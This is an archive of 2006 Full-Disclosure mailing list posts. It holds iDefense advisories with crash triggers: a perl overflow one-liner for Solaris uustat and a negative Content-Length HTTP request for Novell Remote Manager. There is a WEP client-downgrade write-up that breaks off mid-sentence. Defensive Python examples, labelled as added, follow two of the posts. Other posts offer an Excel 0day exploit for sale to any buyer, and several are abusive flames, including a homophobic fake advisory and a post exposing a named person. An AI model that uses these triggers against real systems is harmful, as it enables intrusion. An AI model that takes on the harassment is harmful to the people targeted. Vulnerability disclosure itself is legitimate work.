Seriously though, I think the fact that someone else duplicated their
patch (file date in the patch of the 28th shows this, as well as the
bindiff), and that they then had pre-hotfix-release information on what
bugs occurred due to the removal of this abortproc wmf "feature" on a
very large customer base (300GB of uploads before the site was taken
offline, that's a _big_ test user base), was what made it possible for
MS to release the patch earlier than promised.

Still though, Gadi is right that this shows if there is enough demand
for an RC1 patch, they may release them as long as the exploit can
be googled beforehand and MS doesn't have to worry about ppl RCE'ing the
beta patch and creating an exploit as a result of their program.

a lot of "ifs" but it can happen

-JP


Re: [Full-disclosure] location

2006-01-07 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
looks like you also need to update yourself randall m :> here are
correct links:

Official archives: http://lists.grok.org.uk/pipermail/full-disclosure/
Charter: http://lists.grok.org.uk/full-disclosure-charter.html

How to subscribe to this list:
View https://lists.grok.org.uk/mailman/listinfo/full-disclosure

Address to post to this list:
full-disclosure@lists.grok.org.uk



Randall M wrote:
> Someone needs to have Neohapsis update their information:
>
> http://archives.neohapsis.com/archives/fulldisclosure/
> Official archives: http://lists.netsys.com/pipermail/full-disclosure/
>
> How to subscribe to this list:
> View http://lists.netsys.com/mailman/listinfo/full-disclosure
>
> Address to post to this list:
> full-disclosurelists.netsys.com
>





Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2006-01-08 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
after many hours working on excel I have found a
critical exploitable excel bug. This is not a stack bof
nor a heap bof, a bug extremely hard to find and trigger, but it
leads excel to execute arbitrary code while opening a malicious
.xls file.

note: the bug isn't related to both excel dos that I have already
published but looks similar to a null pointer bug at first look.
much info won't be disclosed publicly or privately and this will be
transmitted to ms before the spyware losers catch it :)

> I have said so this is only null pointer bugs but the way I trigger
> the bug might be modded for a remote code execution who know , I'm
> not a guru and maybe did an error triggering the flaw who knows :)
> but I bet many are already researching on this hehe, happy job!



> Let's go on the fast publishing :) I wont bother to message
> microsoft about this because they wont patch it for sure according
> that they can't patch fully exploitable bugs in a decent time, they
> do not patch IE dos (http://heapoverflow.com/IEcrash.htm), so no
> way to bother them, we should let them sleep a bit shhh ;)
>
> Bugs 1 and Bugs 2 are quite similar but NOT, both are null pointer
> bugs. In bug1 you should mod a graphic's pointer to point to a bad
> area, and in bug 2 you should null out the size of the page name.
>
>
> attached are the 2 pocs, or here are direct links
>
>
> http://heapoverflow.com/excelol/bug1.xls
> 
> http://heapoverflow.com/excelol/bug2.xls
> 
>
>
>
> Credits:
>
> AD [at] heapoverflow.com




Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2006-01-08 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
no I guess there are some interesting responsible programs over there
which will be interested in acquiring it for a few zeros before the $ ;)
I'm not crazy enough to give it on ebay if that's what you need to
know sorry he.


Georgi Guninski wrote:
> will there be a chance of bidding on something more reliable than ebay?
>





Re: [Full-disclosure] Open Letter on the Interpretation of "Vulnerability Statistics"

2006-01-08 Thread [EMAIL PROTECTED]
InfoSecBOFH wrote:

>Actually George and is one up on me because he also posts nothing of
>value anymore.  So here is a question, do you suck every former and
>undeserved internet rock star's dick on this list or just the
>eurotrash ones?
>  
>

Do you have a fetish or something? Do you whack off after emailing a
particularly vulgar email to a public mailing list? Do you post then
stroke the roast? One wonders from which such passion expressed
constantly in public comes from, just make sure you clean your keyboard
off afterwards

That'll be $3.50 for the erotic email, i'll just bill your parents as usual

-JP
"That man is a pervert"
-J.T. Ripper


[Full-disclosure] iDefense Security Advisory 01.09.06: Multiple Vendor mod_auth_pgsql Format String Vulnerability

2006-01-09 Thread [EMAIL PROTECTED]
www.redhat.com/archives/fedora-announce-list/2006-January/msg00015.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3656 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/22/2005  Initial vendor response
01/09/2006  Coordinated public disclosure

IX. CREDIT

The discovery of this vulnerability is credited to Sparfell.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


Re: [Full-disclosure] FWD Cisco IOS Remote Command Execution Vulnerability

2006-01-09 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I'm sure it's a fake, there is the word "InfoSecBOFH" in it several
times :


terry comma wrote:
> -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Symantec
> Vulnerability Alert Cisco IOS Remote Command Execution
> Vulnerability Bugtraq ID 16069 CVE CVE-PLH-NOMATCH Published Jan 09
> 2006 6:22:69 PM GMT Remote Yes Local No Credibility Vendor
> Confirmed Classification Access Validation Error Ease No Exploit
> Required Availability Always Impact 9.3 Severity 8.1 Urgency Rating
> 9.4 Last Change Cisco has responded to this issue; see Technical
> Information and References for details.
>
> Vulnerable Systems - -- Cisco IOS 12.2 T Cisco IOS
> 12.2 SZ Cisco IOS 12.2 SY Cisco IOS 12.2 SX Cisco IOS 12.2 S Cisco
> IOS 12.2 MX Cisco IOS 12.2 MC Cisco IOS 12.2 MB Cisco IOS 12.2 JA
> Cisco IOS 12.2 DX Cisco IOS 12.2 DD Cisco IOS 12.2 DA Cisco IOS
> 12.2 CY Cisco IOS 12.2 CX Cisco IOS 12.2 BZ Cisco IOS 12.2 BX Cisco
> IOS 12.2 BW Cisco IOS 12.2 BC Cisco IOS 12.2 B Cisco IOS 12.2
> 12.2XU Cisco IOS 12.2
>
> Short Summary - - Some Cisco IOS versions are allegedly
> prone to an issue that may permit gay people to execute arbitrary
> commands from a password prompt.
>
> Impact - -- Remote attackers with small dicks may allegedly
> execute shell commands on a vulnerable device without needing to
> authenticate.
>
> Technical Description - - It has been alleged
> that it is possible for remote attackers to execute arbitrary
> commands without proper authorization. Reportedly it is possible to
> execute shell commands from the password prompt on a device. The
> attacker must have a small dick and be able to connect to a
> vulnerable device via telnet, although it has not been ruled out
> that bigger dicks may present other attack vectors. The discoverer
> of this vulnerability has stated that it is possible to exploit
> this issue by inputting 'IamGay!' at the password prompt. Cisco has
> replied stating that only InfoSecBOFH is gay enough to exploit this
> issue. Details are available to registered Cisco users at:
> http://www.cisco.com/pcgi-bin/Support/InfoSecBOFH/ishegay.pl?bugid=CSCdr16069
>
>
> Attack Scenarios -  The attacker must identify a
> vulnerable device and be in possession of a small dick.
>
> Exploits -  There is no exploit required.
>
> Mitigating Strategies - - Block InfoSecBOFH
> access at the network boundary, unless the service is required by
> external third party gay porn sites.
>
> Solutions - - Currently we are not aware of any
> vendor-supplied patches for this issue. If you feel we are in error
> or are aware of more recent information, please mail us at: vuldb
> at securityfocus.com .
>
> Credit - -- Discovery is credited to InfoSecBOFH at gmail.com
>
> For help with interpreting the meaning of any of the sections or
> labels in the alert, please visit:
> https://alerts.symantec.com/help/sia-users/vulnerability-alert-pdf.htm
>  View public key at:
> https://alerts.symantec.com/Members/gnupg-sigkey.asp Symantec
> Corporation The World Leader in Internet Security Technology and
> Early Warning Solutions Visit our website at www.symantec.com




[Full-disclosure] Gerald Eisenhaur

2006-01-10 Thread [EMAIL PROTECTED]

Is a great Reverse Engineer. Worked at Cisco, helping them with Cisco
Security Agent. He left his job to get a better paycheck at webroot,
working on their advanced threat research team. Before going to webroot,
he signed several agreements, not the least of which was a non-compete
agreement.

4 Months ago, Gerry contacted me. He said that if I came to Boulder, he
would pay me 50k up front to help him with a 1/4 mil contract he had
gotten RCE'ing csa 5.0 for cisco. He has since decided not to pay me
(after I quit my job and moved to CO in order to help him).

Because of that, I have decided to tell his employer that he is in
violation of his contract, and is actively helping their competition
while collecting a paycheck from webroot.

Merry Christmas Gerry, have fun being homeless like me. Maybe you will
think twice before ruining someone else's life next time.

-JP
"from the heart of hell, I stab at thee"

P.S.: I don't care if you kill me, at this point, you would just be doing
me a favor


Re: [Full-disclosure] Gerald Eisenhaur

2006-01-10 Thread [EMAIL PROTECTED]
InfoSecBOFH wrote:

>Wow... script kiddy bullshit.
>
>1.)  Who gives a fuck
>  
>
me

>2.)  Who gives a fuck
>  
>
gerry

>and
>
>3.)  Who gives a fuck..
>
>  
>
webroot

>Take your personal bullshit to yourself and not stupid mailing lists. 
>I don't give a fuck if god himself fucked you for 1.00 let alone a few
>K.
>  
>
lol, this coming from you of all ppl, it would only be more ironic
coming from netdev.

>Perhaps if you had a clue or if the person that fucked you had a
>clue.. you would not have gotten fucked...
>  
>
No shit Sherlock, obviously I am an idiot or else I would still be in my
house working at my (formerly) great job, rather than sleeping on a
pillow made of packing peanuts using my coat as a blanket.

-JP
"where do you want me to go today"
-JP


[Full-disclosure] iDefense Security Advisory 01.10.06: Sun Solaris uustat Buffer Overflow Vulnerability

2006-01-10 Thread [EMAIL PROTECTED]

Sun Solaris uustat Buffer Overflow Vulnerability

iDefense Security Advisory 01.10.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=366
January 10, 2006

I. BACKGROUND

The uustat binary (part of the uucp project) is used to display or
cancel uucp requests as well as to provide general status on uucp
connections to other systems.

II. DESCRIPTION

A buffer overflow vulnerability exists in the /usr/bin/uustat binary in
Sun Solaris 5.8 and 5.9.

The uustat binary is installed setuid "uucp" by default on Solaris. The
"-S" command line argument causes the binary to crash when followed
with a string that is greater than or equal to 1152 bytes in length.

The following shows the buffer being overflowed and then the o1
register being completely overwritten with the letter 'A':

bash-2.03% ls -l /usr/bin/uustat
---s--x--x   1 uucp     uucp       62012 Jan 17 16:07 uustat

bash-2.03$ /usr/bin/uustat -S `perl -e 'print "A"x3000'`
Segmentation Fault
bash-2.03$
(gdb) info registers
g0 0x0  0
g1 0xff315e98   -13541736
g2 0x1cc00  117760
g3 0x4401088
g4 0x0  0
g5 0x0  0
g6 0x0  0
g7 0x0  0
o0 0xff3276a8   -13470040
o1 0x41414141   1094795585
...

III. ANALYSIS

By exploiting this buffer overflow, an attacker can potentially gain
control of the return address of the executing function, allowing
arbitrary code execution with "uucp" privileges.

IV. DETECTION

Solaris 8 and 9 running on SPARC and x86 architectures are vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

The vendor has released the following advisory to address this issue:

 http://sunsolve.sun.com/search/document.do?assetkey=1-26-101933-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0780 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/11/2004   Initial vendor contact
08/11/2004   Initial vendor response
01/10/2006   Coordinated public disclosure

IX. CREDIT

Angelo Rosiello (http://www.rosiello.org) is credited with discovering
this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2006-01-10 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I have got many questions about the severity of the bug , you can show
a demo yourself here:

http://heapoverflow.com/excelol/excel_like_hell.swf

ms will fix this issue soon I'm sure, for me, job done, bye :>

[EMAIL PROTECTED] wrote:
> after many hours working on excel I have found a critical exploitable
> excel bug. This is not a stack bof nor a heap bof, a bug
> extremely hard to find and trigger, but it leads excel to
> execute arbitrary code while opening a malicious .xls file.
>
> note: the bug isn't related to both excel dos that I have already
> published but looks similar to a null pointer bug at first look.
> much info won't be disclosed publicly or privately and this will
> be transmitted to ms before the spyware losers catch it :)
>
>>> I have said so this is only null pointer bugs but the way I
>>> trigger the bug might be modded for a remote code execution who
>>> knows, I'm not a guru and maybe did an error triggering the
>>> flaw who knows :) but I bet many are already researching on
>>> this hehe, happy job!
>
>
>
>>> Let's go on the fast publishing :) I wont bother to message
>>> microsoft about this because they wont patch it for sure
>>> according that they can't patch fully exploitable bugs in a
>>> decent time, they do not patch IE dos
>>> (http://heapoverflow.com/IEcrash.htm), so no way to bother
>>> them, we should let them sleep a bit shhh ;)
>>>
>>> Bugs 1 and Bugs 2 are quite similar but NOT, both are null
>>> pointer bugs. In bug1 you should mod a graphic's pointer to
>>> point to a bad area, and in bug 2 you should null out the size
>>> of the page name.
>>>
>>>
>>> attached are the 2 pocs, or here are direct links
>>>
>>>
>>> http://heapoverflow.com/excelol/bug1.xls
>>> http://heapoverflow.com/excelol/bug2.xls
>>>
>>>
>>>
>>> Credits:
>>>
>>> AD [at] heapoverflow.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
-END PGP SIGNATURE-




Re: [Full-disclosure] ntpd stack evasion exploit

2006-01-10 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
this is s lol , nice lookup Przemyslaw

Przemyslaw Frasunek wrote:
> !bSt bitwarz Security Team wrote:
>> /* ntpd remote root no-exec stack evasion spl0it * by m0sk0v
>
> well... stolen code from my exploit (and advisory) published almost
> five years ago on bugtraq. only comments and printfs were changed.
>
>
> http://marc.theaimsgroup.com/?l=bugtraq&m=98642418618512&w=2
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
-END PGP SIGNATURE-




[Full-disclosure] Critical excel vulnerability for sale, read inside.

2006-01-11 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
It has not been possible for me to reach an agreement with zdi nor
idefense for selling the excel bug because I have publicly warned
about a remote command execution in my forum. I have tried to excuse
myself for my self-starting mistakes in the responsible disclosure and
to explain to them: if I find a 2nd excel critical bug, how can I
submit it to them since I have publicly warned about an excel flaw?
Should you actually reject any excel flaw then?
No, that's it; they leave me alone with a critical excel flaw, so I
have no other way now to get paid for my research than to leave an
announcement:

A critical excel flaw is for sale; if you wish to buy it, this is what
you will have:


- full advisory (explaining how I have found it, how I exploit it)
- full poc building a xls file; once this file is opened, excel will
arbitrarily run regedit.exe, a bindshellcode, or add an admin user.
- you have all rights on it; since I'm alone able to exploit it, you
will trust me, I never share privately, you will be the only owner of it.

if you wish to see what the bug does, I can make some videos on
demand. And of course if you are willing to buy it, do not offer
something ridiculous.


for any information, [EMAIL PROTECTED]


note: I know this looks like a joke, but I'm serious, I should be paid
for my security research, and I really don't want to help microsoft
for free. the auction is up for whitehats and blackhats, thanks to the
responsible programs on this.
I know I have made a mistake but this was still up to you to stop me.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
-END PGP SIGNATURE-




Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2006-01-12 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I was joking you know , this hole is a fake but shhh ;)

Amit Sharma wrote:
> ad, don't you think it would be a good idea if you either post your
> PoC with complete details otherwise do not post it. I mean from the
> "excel_like_hell.swf" demo, I do not see anything that one would
> infer.
>
> I can see that a xls file is created and on opening it (as per the
> demo), it makes a registry entry. Now how true is this? If you are
> posting no more info here they how is it going to help us otherwise
> what was the intent of the post?
>
> - Amit
>
>
> "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote:
>
> I have got many questions about the severity of the bug , you can
> show a demo yourself here:
>
> http://heapoverflow.com/excelol/excel_like_hell.swf
>
> ms will fixe this issue soon I'm sure, for me , job done, bye :>
>
> [EMAIL PROTECTED] wrote:
>> after many hours working on excel I have found a critical excel
>> bug exploitable. This is not a stack bof nor a heap bof , a bug
>> extremely hard to find and trigger , but it conduct excel to
>> execute any arbitrary codes while opening a malicious .xls file.
>
>> note: the bug isn't related to both excel dos that I have already
>>  published but shows similiar to a null pointer bug at a first
>> look. much infos won't be disclosed publicly or privately and
>> this will be transmitted to ms before the spyware loosers catch
>> it :)
>
>>>> I have said so this is only null pointer bugs but the way I
>>>> trigger the bug might be modded for a remote code execution
>>>> who know , I'm not a guru and maybe did an error triggering
>>>> the flaw who knows :) but I bet many are already reasearching
>>>> on this hehe, happy job!
>
>
>
>>>> Let's go on the fast publishing :) I wont bother to message
>>>> microsoft about this because they wont patch it for sure
>>>> according that they can't patch fully exploitable bugs in a
>>>> decent time, they do not patch IE dos
>>>> (http://heapoverflow.com/IEcrash.htm), so no way to bother
>>>> them, we should let them sleep a bit shhh ;)
>>>>
>>>> Bugs 1 and Bugs 2 are quite similiar but NOT, both are null
>>>> pointer bugs . In bug1 you should mod a grafic's pointer to
>>>> point to a bad area, and in bug 2 you should null out the
>>>> size of the page name.
>>>>
>>>>
>>>> attached are the 2 pocs, nor here are direct links
>>>>
>>>>
>>>> http://heapoverflow.com/excelol/bug1.xls
>>>>
>>>> http://heapoverflow.com/excelol/bug2.xls
>>>>
>>>>
>>>>
>>>>
>>>> Credits:
>>>>
>>>> AD [at] heapoverflow.com





-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
-END PGP SIGNATURE-




[Full-disclosure] iDefense Security Advisory 01.13.06: Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow

2006-01-13 Thread [EMAIL PROTECTED]

Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow

iDefense Security Advisory 01.13.06
http://www.idefense.com/application/poi/display?type=vulnerabilities
January 13, 2006

I. BACKGROUND

Novell SUSE Linux Enterprise Server is a platform for open source
computing in an enterprise environment.

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Novell Inc.'s
Open Enterprise Server Remote Manager allows attackers to execute
arbitrary code.

III. ANALYSIS

The vulnerability specifically exists due to improper handling of an
HTTP POST request with a negative Content-Length parameter. When such a
request is received, controllable heap corruption occurs which can lead
to the execution of arbitrary code using traditional Linux heap overflow
methods. The following HTTP request can be used to trigger this
vulnerability.

 POST / HTTP/1.0
 Content-Length: -900

 DATA_THAT_WILL_BE_USED_TO_OVERWRITE_THE_HEAP

iDefense Labs testing has determined that with careful manipulation of
the string, an arbitrary 4 byte write may be achieved which can be used
to gain execution control.

IV. DETECTION

iDefense has confirmed this vulnerability in Novell SUSE Linux
Enterprise Server 9. All previous versions are suspected vulnerable.
Novell SUSE Linux Enterprise Server components are included in Novell
Open Enterprise Server; as such, Open Enterprise Server is also
vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Novell has released the following advisories to address this issue:

 http://portal.suse.com/psdb/1af470a99a736eb966cc0e52fb71ee98.html
 http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/1af470a99a736eb966cc0e52fb71ee98.html


SUSE has released the following advisories to address this issue:

 http://www.novell.com/linux/security/advisories/2006_02_novellnrm.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3655 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/15/2005  Initial vendor response
01/13/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
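Added example, not part of the iDefense advisory and not Novell's Remote Manager code: a small Python request parser that contrasts the lenient Content-Length handling the advisory describes (a signed parse that hands back -900 as a length) with a parser that enforces the RFC 2616 grammar (1*DIGIT) plus a size cap. The two requests and the MAX_BODY limit are constructed for the example.

```python
"""Content-Length handling: a lenient parser beside a strict one.

Added example for the Remote Manager advisory above; it is not iDefense's
or Novell's code.  Both requests are constructed, modelled on the trigger
shown in section III.  MAX_BODY is a hypothetical per-request limit.
"""
import re

# Constructed request modelled on the advisory's trigger (not captured traffic).
MALFORMED_REQUEST = (
    b"POST / HTTP/1.0\r\n"
    b"Content-Length: -900\r\n"
    b"\r\n"
    b"DATA_THAT_WILL_BE_USED_TO_OVERWRITE_THE_HEAP"
)

# Constructed well-formed request for comparison.
VALID_REQUEST = (
    b"POST / HTTP/1.0\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"hello"
)

MAX_BODY = 1 << 20  # hypothetical per-request body limit (1 MiB)

# RFC 2616 grammar: Content-Length = "Content-Length" ":" 1*DIGIT
DIGITS_ONLY = re.compile(r"[0-9]+")


def split_request(raw: bytes):
    """Split a raw request into (request line, header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0], headers, body


def lenient_content_length(headers: dict) -> int:
    """The weak pattern: int() (like C's atoi) accepts a sign, so "-900"
    comes back as a negative length.  In a C service that value is then
    used in size arithmetic or passed to a copy routine as an unsigned
    size, which is the heap corruption the advisory describes."""
    return int(headers.get("content-length", "0"))


def strict_content_length(headers: dict) -> int:
    """Hardened: only 1*DIGIT is accepted and the value is capped, so a
    signed, empty or oversized length is rejected before any buffer is
    sized from it."""
    value = headers.get("content-length")
    if value is None:
        return 0
    if not DIGITS_ONLY.fullmatch(value):
        raise ValueError(f"malformed Content-Length: {value!r}")
    length = int(value)
    if length > MAX_BODY:
        raise ValueError(f"Content-Length {length} exceeds limit {MAX_BODY}")
    return length


def read_body(raw: bytes) -> bytes:
    """Parse with the strict rule and return exactly the declared body;
    raises ValueError on a malformed length or a short body."""
    _, headers, body = split_request(raw)
    length = strict_content_length(headers)
    if len(body) < length:
        raise ValueError("body shorter than declared Content-Length")
    return body[:length]


def is_well_formed(raw: bytes) -> bool:
    """Check a front-end filter could apply before forwarding a request."""
    try:
        read_body(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name, req in (("malformed", MALFORMED_REQUEST), ("valid", VALID_REQUEST)):
        _, hdrs, _ = split_request(req)
        print(name, "lenient ->", lenient_content_length(hdrs),
              "| strict accepts:", is_well_formed(req))
```

The strict parser is also the check a reverse proxy in front of an unpatched server can apply: a Content-Length that is not a plain digit string never reaches the vulnerable handler.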


[Full-disclosure] WEP-Client-Communication-Dumbdown (WCCD) Vulnerability (re-send)

2006-01-16 Thread [EMAIL PROTECTED]
sorry, earlier email seems to have not gotten through

--- Forwarded message follows ---
To: full-disclosure@lists.grok.org.uk
Subject: WEP-Client-Communication-Dumbdown (WCCD) Vulnerability
Date sent: Mon, 16 Jan 2006 17:23:09 +0800

ThinkSECURE Pte Ltd  (www.securitystartshere.net) has released 
details of a client-side wireless vulnerability which affects 
wireless users who are still using WEP.  

More details including mitigation actions are available at our 
website at:
http://www.securitystartshere.net/page-vulns-wccd.htm



### Vulnerability Name ###
WEP-Client-Communication-Dumbdown (WCCD) Vulnerability



### Vulnerability Description ### 
ThinkSECURE has discovered that certain well-known wireless chipsets,
using vulnerable drivers under the Windows XP operating system and
when configured to use WEP with Open Authentication, can be tricked
by an 802.11-based wireless client adapter operating in master mode
("the attacker") into discarding the WEP settings and negotiating a
post-association connection with the attacker in the clear.

We have named this vulnerability the "WEP-client-communication-
dumbdown" (wccd) vulnerability.

This vulnerability is apparently not due to Windows itself but due to 
the operation of the drivers for the affected wireless cards.   
However, this does not discount a situation where a patch could be 
released by Microsoft to deal with the problem on the chipset makers' 
behalf.  
Again, this is apparently NOT a Windows problem but a wireless 
chipset driver-related one.

End users of the system would not notice any difference about the
clear connection being established.
Although WPA/2 & WPA-PSK have been out for some time now, in our
experience there is still a large installed client base who are still
using WEP-enabled Access Points and thus have WEP-enabled profiles
set up in their laptops.  This installed base is vulnerable.



### Vulnerability Impact ###
The vulnerability was observed in a Windows XP wireless client 
configuration with the vulnerable drivers and with the following 
setups: 
1. Profile configured using Windows XP zero configuration as well as 
using the vulnerable drivers' bundled wireless client managers;
2. Profile configured to use WEP with static WEP key & Open 
Authentication.

Using ThinkSECURE's recently-released security auditor's tool -  
probemapper - one can remotely evaluate the SSID and capabilities of 
wireless profiles from probe requests and assess whether the subject 
is probing for any Open-Authentication-WEP-encryption-enabled 
wireless networks.

When a Windows XP client using a vulnerable chipset driver is 
configured as outlined above via their wireless profiles ("the 
victim"), the victim will send out probe requests bearing the SSID 
configured in the wireless profile.  

An attacker who detects the probe request frames coming from the 
configured profile can configure a master-mode-enabled wireless card 
with the detected SSID of the probe request frames and, using Open 
Authentication with no-encryption, send probe responses to the 
victim.   

The victim will then initiate authentication and association, sending 
an association request frame with the Privacy Bit set to 1 (AP/STA 
can support WEP).  

The attacker returns an association response frame with Privacy Bit 
set to 0 (AP/STA cannot support WEP).

Although the correct behavior should be to not establish any 
communication due to the difference between association request and 
response Privacy Bits, the victim "dumbs-down" and establishes an un-
encrypted communications session to match the attacker's Privacy Bit 
setting of 0, thus ignoring the WEP settings as configured in the 
client's profile. All traffic to & from this connection will be sent 
in the clear.

A victim who has a vulnerable wireless network at home and brings a 
laptop bearing the profile of said home wireless network to his/her 
organization and plugs in using a wired connection may be attacked in 
this manner and used as a conduit by the attacker, through the 
bridging of the laptop's wireless interface to the wired interface, 
to the victim's organization's wired network, thus bypassing 
corporate perimeter defences. It is irrelevant that the organization 
does not use wireless or has a no-wireless policy if that policy is 
not strictly enforced through proactive checking.

Also, firewalling on the victim's laptop might not guarantee safety 
in certain cases: e.g. the attacker issues an IP address and gateway 
address to the victim in response to the victim's typical DHCP 
request upon association so as to fool the victim's machine into 
forwarding all traffic to the attacker's machine. The result is that, 
when the victim opens up a web browser for example, he will see a 
crafted page bearing malicious code on the attacker's machine which 
runs exploit code on the victim's machine (a good example being the 
recent
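As an added illustration of the Privacy-bit mismatch described above (example code, not ThinkSECURE's probemapper and not any vendor's driver), here is a Python parser for association request and response bodies together with the check a client should apply before completing an association, and the equivalent monitor-side test that flags a downgrade. The frame bodies, SSID and status code are constructed for the example; the field layout follows the IEEE 802.11 frame formats.

```python
"""Privacy-bit consistency check for 802.11 association frames.

Added example for the WCCD write-up above; not ThinkSECURE's code and not
part of probemapper.  Frame bodies are constructed, not captured.  Layout
per IEEE 802.11: Capability Information is a little-endian 16-bit word
whose bit 4 (0x0010) is Privacy; an association request body starts with
Capability Info + Listen Interval, an association response with
Capability Info + Status Code + AID, each followed by information
elements (IEs) in id/length/data form.
"""
import struct

PRIVACY = 0x0010   # Capability Information bit 4: Privacy (WEP in use)
ESS = 0x0001       # bit 0: infrastructure network
SSID_IE = 0        # element ID of the SSID information element


def privacy_set(capability: int) -> bool:
    return bool(capability & PRIVACY)


def find_ssid(ies: bytes) -> str:
    """Walk the IE list (id, length, data triples) and return the SSID."""
    i = 0
    while i + 2 <= len(ies):
        eid, length = ies[i], ies[i + 1]
        data = ies[i + 2:i + 2 + length]
        if eid == SSID_IE:
            return data.decode("utf-8", "replace")
        i += 2 + length
    return ""


def parse_assoc_request(body: bytes) -> dict:
    capability, listen_interval = struct.unpack_from("<HH", body, 0)
    return {"privacy": privacy_set(capability),
            "listen_interval": listen_interval,
            "ssid": find_ssid(body[4:])}


def parse_assoc_response(body: bytes) -> dict:
    capability, status, aid = struct.unpack_from("<HHH", body, 0)
    return {"privacy": privacy_set(capability),
            "status": status,
            "aid": aid & 0x3FFF}   # the two high bits of the AID field are always set


def client_should_accept(profile_requires_wep: bool, response: bytes) -> bool:
    """The behaviour the write-up calls correct: a successful response whose
    Privacy bit does not match a WEP profile is refused rather than
    silently downgraded to a clear-text association."""
    resp = parse_assoc_response(response)
    if resp["status"] != 0:
        return False
    return resp["privacy"] or not profile_requires_wep


def dumbdown_observed(request: bytes, response: bytes) -> bool:
    """Monitor-side detection: a request with Privacy=1 answered by a
    successful response with Privacy=0 is the downgrade described above."""
    req = parse_assoc_request(request)
    resp = parse_assoc_response(response)
    return resp["status"] == 0 and req["privacy"] and not resp["privacy"]


# --- constructed frame bodies (not captured traffic) ---
SSID = b"homenet"
ASSOC_REQ = struct.pack("<HH", ESS | PRIVACY, 10) + bytes([SSID_IE, len(SSID)]) + SSID
ASSOC_RESP_CLEAR = struct.pack("<HHH", ESS, 0, 0xC001)          # Privacy=0, success
ASSOC_RESP_WEP = struct.pack("<HHH", ESS | PRIVACY, 0, 0xC001)  # Privacy=1, success
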